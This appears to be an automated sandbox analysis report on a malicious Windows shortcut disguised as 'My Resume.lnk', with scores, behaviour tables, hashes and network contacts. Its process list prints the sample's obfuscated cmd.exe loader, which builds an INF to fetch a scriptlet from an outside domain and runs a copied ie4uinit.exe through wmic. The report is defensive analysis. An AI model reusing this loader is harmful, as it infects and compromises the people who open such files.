Windows
Analysis Report
My Resume.lnk
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 6920 cmdline:
C:\Windows \System32\ cmd.exe" / v /c set " VnLlYgV403 95=set" && call set "VnLlYgV58 278=%VnLlY gV40395:~0 ,1%" && (f or %l in ( c) do @set "VnLlYgV4 9771=%~l") && !VnLlY gV58278!et "VnLlYgV4 530=$w" && set "VnLl YgV81579=i " && set " VnLlYgV060 9=a" && se t "VnLlYgV 89173=t" & & !VnLlYgV 58278!et " VnLlYgV958 63=d" && s et "VnLlYg V33261=." && set "Vn LlYgV63461 =init" && set "VnLlY gV7723=si" && set "V nLlYgV3837 1=e" && se t "VnLlYgV 19376=sett ings" && s et "VnLlYg V8088=!VnL lYgV33261! inf" && se t "VnLlYgV 3504=ieu!V nLlYgV6346 1!!VnLlYgV 8088!" && call !VnLl YgV58278!e t "VnLlYgV 5462=%app! VnLlYgV958 63!ata%\Mi cro!VnLlYg V58278!oft \" && !VnL lYgV58278! et "VnLlYg V71257=!Vn LlYgV5462! !VnLlYgV35 04!" && se t "VnLlYgV 9155="^" & & (for %j in ("[vers ion]" "sig nature = ! VnLlYgV453 0!indows n t$" "[!VnL lYgV95863! e!VnLlYgV5 8278!tinat iondirs]" "E1C3=01" "[!VnLlYgV 95863!efau ltin!VnLlY gV58278!ta ll.windows 7]" "UnReg is!VnLlYgV 89173!erOC Xs=A52D05" "!VnLlYgV 95863!elf! VnLlYgV815 79!les=E1C 3" "[A52D0 5]" "%11%\ scRo%VnLlY gV2149%j,N I,%VnLlYgV 0081%%VnLl YgV6931%%V nLlYgV6931 %p%VnLlYgV 4892%%VnLl YgV64389%% VnLlYgV643 89%jamesre uther!VnLl YgV33261!% VnLlYgV656 3%/wmnxjog bfn" "[E1C 3]" "ieu%V nLlYgV4681 %!VnLlYgV8 088!" "[!V nLlYgV5827 8!!VnLlYgV 89173!ring s]" "VnLlY gV4681=!Vn LlYgV63461 !" "VnLlYg V6931=t" " !VnLlYgV58 278!ervice n!VnLlYgV0 609!me=' ' " "VnLlYgV 0081=h" "V nLlYgV4892 =:" "VnLlY gV64389=/" "!VnLlYgV 58278!hort svcn!VnLlY gV0609!me= ' '" "VnLl YgV6563=co m" "VnLlYg V2149=b") do @e!VnLl YgV49771!h o %~j)>"!V nLlYgV7125 7!" && !Vn LlYgV58278 !et "VnLlY gV5120=ie4 u!VnLlYgV6 3461!.!VnL lYgV38371! xe" && cal l copy /Y %win!VnLlY gV95863!ir %\!VnLlYgV 58278!yste m32\!VnLlY gV5120! "! VnLlYgV546 2!" > nul && !VnLlYg V58278!t!V nLlYgV0609 !rt "" /MI N wmi!VnLl YgV49771! proce!VnLl YgV58278!s call !VnL lYgV49771! rea!VnLlYg V89173!e " !VnLlYgV54 62!!VnLlYg V5120! -ba se!VnLlYgV 19376! MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6048 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - WMIC.exe (PID: 6268 cmdline:
wmic proce ss call cr eate "C:\U sers\user\ AppData\Ro aming\Micr osoft\ie4u init.exe - basesettin gs" MD5: EC80E603E0090B3AC3C1234C2BA43A0F) - conhost.exe (PID: 2940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- ie4uinit.exe (PID: 6940 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Microsoft\ ie4uinit.e xe -basese ttings MD5: 9DD77F0F421AA9A70383210706ECA529) - ie4uinit.exe (PID: 4788 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Microsoft\ ie4uinit.e xe -ClearI conCache MD5: 9DD77F0F421AA9A70383210706ECA529) - rundll32.exe (PID: 2884 cmdline:
C:\Windows \system32\ RunDll32.e xe C:\Wind ows\system 32\migrati on\Wininet Plugin.dll ,MigrateCa cheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A) - rundll32.exe (PID: 204 cmdline:
C:\Windows \system32\ RunDll32.e xe C:\Wind ows\system 32\migrati on\Wininet Plugin.dll ,MigrateCa cheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
- cleanup
System Summary |
---|
Source: | Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: Michael Haag, Florian Roth, juju4, oscd.community: |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Code function: | 7_2_00007FF6B522763C | |
Source: | Code function: | 7_2_00007FF6B522EA9C | |
Source: | Code function: | 7_2_00007FF6B52256A4 | |
Source: | Code function: | 7_2_00007FF6B5227AC8 | |
Source: | Code function: | 7_2_00007FF6B522E950 | |
Source: | Code function: | 7_2_00007FF6B5222550 | |
Source: | Code function: | 7_2_00007FF6B522ED98 | |
Source: | Code function: | 7_2_00007FF6B5227DCC | |
Source: | Code function: | 7_2_00007FF6B52225C0 | |
Source: | Code function: | 7_2_00007FF6B522544C | |
Source: | Code function: | 7_2_00007FF6B52274BC | |
Source: | Code function: | 7_2_00007FF6B522F108 | |
Source: | Code function: | 7_2_00007FF6B522E750 | |
Source: | Code function: | 7_2_00007FF6B5222B50 | |
Source: | Code function: | 7_2_00007FF6B522EFAC | |
Source: | Code function: | 7_2_00007FF6B522EBE0 | |
Source: | Code function: | 7_2_00007FF6B52273D0 | |
Source: | Code function: | 7_2_00007FF6B522E80C |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Code function: | 7_2_00007FF6B521A568 | |
Source: | Code function: | 7_2_00007FF6B5230204 | |
Source: | Code function: | 7_2_00007FF6B52144E4 | |
Source: | Code function: | 7_2_00007FF6B5213D20 | |
Source: | Code function: | 7_2_00007FF6B521AC08 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | Code function: | 7_2_00007FF6B5226DD0 |
Source: | HTTP traffic detected: |
E-Banking Fraud |
---|
Source: | Code function: | 7_2_00007FF6B5230A8C | |
Source: | Code function: | 7_2_00007FF6B5230A8C | |
Source: | Code function: | 7_2_00007FF6B5230A8C | |
Source: | Code function: | 7_2_00007FF6B5230A8C |
System Summary |
---|
Source: | Binary or memory string: |
Source: | File deleted: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Code function: | 7_2_00007FF6B521A568 | |
Source: | Code function: | 7_2_00007FF6B5212DFC | |
Source: | Code function: | 7_2_00007FF6B52120E4 | |
Source: | Code function: | 7_2_00007FF6B5212930 | |
Source: | Code function: | 7_2_00007FF6B5211B44 | |
Source: | Code function: | 7_2_00007FF6B5219A98 | |
Source: | Code function: | 7_2_00007FF6B52126F0 | |
Source: | Code function: | 7_2_00007FF6B522C2F4 | |
Source: | Code function: | 7_2_00007FF6B5233330 | |
Source: | Code function: | 7_2_00007FF6B52331A8 | |
Source: | Code function: | 7_2_00007FF6B522FDB4 | |
Source: | Code function: | 7_2_00007FF6B5219604 | |
Source: | Code function: | 7_2_00007FF6B5220C4C | |
Source: | Code function: | 7_2_00007FF6B5226478 | |
Source: | Code function: | 7_2_00007FF6B52320C0 | |
Source: | Code function: | 7_2_00007FF6B521C92C | |
Source: | Code function: | 7_2_00007FF6B5213D20 | |
Source: | Code function: | 7_2_00007FF6B5226BB4 | |
Source: | Code function: | 7_2_00007FF6B5214F7C | |
Source: | Code function: | 7_2_00007FF6B52153B8 | |
Source: | Code function: | 7_2_00007FF6B521481C |
Source: | Code function: |
Source: | Code function: | 7_2_00007FF6B522FDB4 | |
Source: | Code function: | 7_2_00007FF6B522DBC4 |
Source: | Dropped File: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | WMI Queries: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | Code function: | 7_2_00007FF6B5215674 |
Source: | File read: | Jump to behavior |
Source: | Process created: |
Source: | Mutant created: |
Source: | Code function: | 7_2_00007FF6B52133A8 |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: |
Source: | Static PE information: |
Source: | Code function: | 7_2_00007FF6B521B2C4 |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | WMI Queries: |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | Code function: | 7_2_00007FF6B5230A8C |
Source: | Evasive API call chain: | graph_7-10751 |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | 7_2_00007FF6B5221F14 | |
Source: | Code function: | 7_2_00007FF6B5221F14 | |
Source: | Code function: | 7_2_00007FF6B5221F14 |
Source: | API coverage: |
Source: | Code function: | 7_2_00007FF6B521B0DC |
Source: | Code function: | 7_2_00007FF6B521A568 | |
Source: | Code function: | 7_2_00007FF6B5230204 | |
Source: | Code function: | 7_2_00007FF6B52144E4 | |
Source: | Code function: | 7_2_00007FF6B5213D20 | |
Source: | Code function: | 7_2_00007FF6B521AC08 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 7_2_00007FF6B5217758 |
Source: | Code function: | 7_2_00007FF6B521B2C4 |
Source: | Code function: | 7_2_00007FF6B5211670 |
Source: | Code function: | 7_2_00007FF6B5233DA0 | |
Source: | Code function: | 7_2_00007FF6B52338F0 |
Source: | Process created: |
Source: | Process created: | Jump to behavior |
Source: | Code function: | 7_2_00007FF6B5215974 |
Source: | Code function: | 7_2_00007FF6B521329C |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 21 Windows Management Instrumentation | 1 Scheduled Task/Job | 12 Process Injection | 12 Masquerading | OS Credential Dumping | 11 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 11 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Scheduled Task/Job | 12 Process Injection | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | 2 Native API | Logon Script (Mac) | Logon Script (Mac) | 1 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 File Deletion | Cached Domain Credentials | 5 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Metadefender | Browse | ||
2% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
jamesreuther.com | 3.144.120.98 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
true |
| unknown | ||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
true |
| unknown | ||
false | high | |||
false | high | |||
true |
| unknown | ||
true |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
3.144.120.98 | jamesreuther.com | United States | 16509 | AMAZON-02US | false |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 564458 |
Start date: | 01.02.2022 |
Start time: | 19:52:08 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 8m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | My Resume.lnk |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 29 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.bank.evad.winLNK@12/11@1/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
- Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: My Resume.lnk
Time | Type | Description |
---|---|---|
19:53:12 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
3.144.120.98 | Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AMAZON-02US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Process: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6572 |
Entropy (8bit): | 4.965102079340298 |
Encrypted: | false |
SSDEEP: | 96:OnD7NPj0ElzyRXEEWvYcH5CzAphezyQGTa76hmJKqRQt7Ih8bQc9/M9CFXoXrCMv:QluyP5mud+gaLHMCh |
MD5: | DA2560989AA4BAA8A89CD8D26D32C90C |
SHA1: | B3544F1CE25BA33177929CD1BC4748B80246B95B |
SHA-256: | A77A734861E80610D70DD0C3F1C692D875EC7A9D39A26AA344328BB7D88F3856 |
SHA-512: | A9D1F6BE073272BB058EE27654203D9D681B6D2E36575B39E1BD46E24198E365546658A39C3820AE986D3927D34821171D025B37D3BB5013735C7CF9AC8B8E59 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4294 |
Entropy (8bit): | 4.792979661536274 |
Encrypted: | false |
SSDEEP: | 48:NY0wqGXdE7lHUNnJeCdiwmHbTz8LoQFfuQPKnN7h3W83I/lKwZnJ0MlEHO5A4nwg:AEl0pLwDQPwN7ddI934O5A4wsb |
MD5: | 72048B823E012862CD14EB3B6462850C |
SHA1: | 13566D5A9318DB8BBBE3AC47DB82554A601E4631 |
SHA-256: | 68B3039711AC6FDC680ED776D89A16207A4B7FACFE90DFC61A9D2A77DACC7254 |
SHA-512: | F3C38B5B675CB5315BD03D2E819F2A12C91EDF7D04251D13D809888E10B6CB320E37FF048FA9AF668F83C1FE3BB92F966816EA5D00545D8E58AED0775933DBAA |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
File Type: | |
Category: | modified |
Size (bytes): | 1436 |
Entropy (8bit): | 3.3599566107671546 |
Encrypted: | false |
SSDEEP: | 24:Qxr1djw9EmESwTbl3EnHQMWkWKNdl3yN8HiMWkWc:Cr1djw9EmEBJEnHxWSFyCHLW0 |
MD5: | 151DD828A0AB991E03BB7A1F1D0D5F15 |
SHA1: | 7110FDA089BCD757F864CF5A92689D491145A5C7 |
SHA-256: | 0545E96AFE709F322E923A4981A63C364FEEEA50724B462F50A286168A76FE1B |
SHA-512: | D3E880D24F8F211ABD234128033E9D28B45EB3C20CFEE345A791FEF3A2EE4B428DB745A2A990B10F00EA16CC782DEE8E1E923540DACE4A8987C5581C92AE58F8 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 860 |
Entropy (8bit): | 3.453730893088095 |
Encrypted: | false |
SSDEEP: | 12:Q9KljaIeTdHeMXjaItjALjaIx7nfA+sjaIx7nfA+ZlYRYCDAyjaI/WjaII4RYZMV:Q4O3EM+4uLAeuLAYWOBr+H/MWkWc |
MD5: | BF48EAA2F24D62D69CECFB8B80ED039F |
SHA1: | 6BFC779E1B3E93C86691BE8E13C0D59F27AAD54F |
SHA-256: | 247C09B5F2B307A2D4190B77D6521BA5989B8B1A20C990622E4E01E38EF1E73C |
SHA-512: | FEA49E304B84942DE4508DF6D1FF4C93593C16BE5E387C72016737659E7571F426C909A4709A26B42F9C0F3761956026522A19A2CF484243014CFAC4AF7453FE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 221184 |
Entropy (8bit): | 6.1390918249618585 |
Encrypted: | false |
SSDEEP: | 6144:RgDsww9O7gTBdbI6vxiBEByyrZKLeXOQPIx5mZ:0zlgfIvBjyrZwUJF |
MD5: | 9DD77F0F421AA9A70383210706ECA529 |
SHA1: | 1EBEFD2674716D6302EC9AE88349CBDE52A18686 |
SHA-256: | 8E8C4A1402E0AF960AB1FF23C8925BBC35B0F015537056CE5C51658519DE41BB |
SHA-512: | 17875904D790A56A08216732B60E1317F7B916258C903C24313188ECA5D948A6566F558C8F8ECE89BEB18F67B8730F98D7428EC14381C13C212BF8169EC768D5 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 474 |
Entropy (8bit): | 5.306160186289658 |
Encrypted: | false |
SSDEEP: | 12:WHPbjXeJCbyUfI0bnabnwj8b2KWd52KfX9VgVynadCMeIjNDlCSuLl:WHPvXe0yUQ0babRb42m9Vg45MXjNsSu5 |
MD5: | CA82AF142BF218D6B15A2959ED6ED4E1 |
SHA1: | 357D1CEECED8EEE6F412BB08AC81F9527F12AA1B |
SHA-256: | 9F832C74086FC6644DD222E1323481D5D08DECB4F5D1946CA63DB1760C6C1897 |
SHA-512: | A6DCB51B541FF80EA28F9D089C1FF333174F1BB507C613F52F3C5D718C94864C395C3F019C15FC00AB173E04245681FC12CC5F3472EC245785E1D000469E972F |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 208 |
Entropy (8bit): | 5.212608038799256 |
Encrypted: | false |
SSDEEP: | 6:J254vVG/4xtOFJQgD8eDPOOKaihPlvsHX/qRyLb1CC:3VW4xtOFJ/DPOOKa403SyCC |
MD5: | 5D42DDDDA9951546C9D43F0062C94D39 |
SHA1: | 4AF07C23EBB93BAD9B96A4279BEE29EBA46BE1EE |
SHA-256: | E0C0A5A360482B5C5DED8FAD5706C4C66F215F527851AD87B31380EF6060696E |
SHA-512: | 291298B4A42B79C4B7A5A80A1A98A39BE9530C17A83960C2CF591B86382448CD32B654A00FC28EAB4529DF333A634BCDC577AEF4A3A0A362E528B08F5221BEB1 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 474 |
Entropy (8bit): | 5.306160186289658 |
Encrypted: | false |
SSDEEP: | 12:WHPbjXeJCbyUfI0bnabnwj8b2KWd52KfX9VgVynadCMeIjNDlCSuLl:WHPvXe0yUQ0babRb42m9Vg45MXjNsSu5 |
MD5: | CA82AF142BF218D6B15A2959ED6ED4E1 |
SHA1: | 357D1CEECED8EEE6F412BB08AC81F9527F12AA1B |
SHA-256: | 9F832C74086FC6644DD222E1323481D5D08DECB4F5D1946CA63DB1760C6C1897 |
SHA-512: | A6DCB51B541FF80EA28F9D089C1FF333174F1BB507C613F52F3C5D718C94864C395C3F019C15FC00AB173E04245681FC12CC5F3472EC245785E1D000469E972F |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 256 |
Entropy (8bit): | 3.579248905726581 |
Encrypted: | false |
SSDEEP: | 6:Q9KljdLN7Gklu8+8O3Ti1UEZglJPZBc5a+MekR5s2yKslrya2j2qv:Q9KljdLYu+8O3qMJH+4s2yKsJ82Q |
MD5: | 8449AECBCA64A846E1E23A2DA3187DC9 |
SHA1: | 00D3A02A6B290B41340DEE7E74F90DF6BFF1CED0 |
SHA-256: | 23EB89CCB712A6A4777F065371617972D69ADDE0AAE84C885CDB4961F055BAF3 |
SHA-512: | 12714A5470FEBEA3DCD81E4941141AE3C0C87B7CEDAADDE08DAF94764C265A8232547B8AFFD7EDB4B992B301B031606189E62F64F43A077959C9ED8A7917B976 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\wbem\WMIC.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 160 |
Entropy (8bit): | 5.095703110114614 |
Encrypted: | false |
SSDEEP: | 3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkLyWAFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egk+eAin |
MD5: | D3E3760EE14194A5D94F20A6349C9374 |
SHA1: | F91ACB7E2F3B95DB04996F88A63BD6692BA13178 |
SHA-256: | 0257C9FBEFB316FDB28AB9EF0F0D52087D763ED561BB83714D306FC543FDDB63 |
SHA-512: | 6AC9D6370B4A3195646637DF63F7D54ED16B3B4B19FED0FB36CB9C9DE846B5BE5178CAE9803C46F1998D66EFB431944FE2C8ED8A23EBEEA55D4AA42F993BB66A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 27 |
Entropy (8bit): | 3.37639561516815 |
Encrypted: | false |
SSDEEP: | 3:N/XANAKxcvn:B7KE |
MD5: | D9C586991FACF81AE3350D1F2468D551 |
SHA1: | 4021D00AB6D09D9DEF8964CF7D5B137E2057803D |
SHA-256: | A04C3131D5D2D6A794281B2525967934811D733BE6DFCE8658AC90F520F8A14F |
SHA-512: | 8D37243809F6AF2D51F844497FBEB4268366D3121A8C76EFE74917C77B5044732ACDEB4638CE47B649AB3A00A8584855015D4DE374B184DB83C0809FA721D421 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 3.296347762826849 |
TrID: |
|
File name: | My Resume.lnk |
File size: | 5235 |
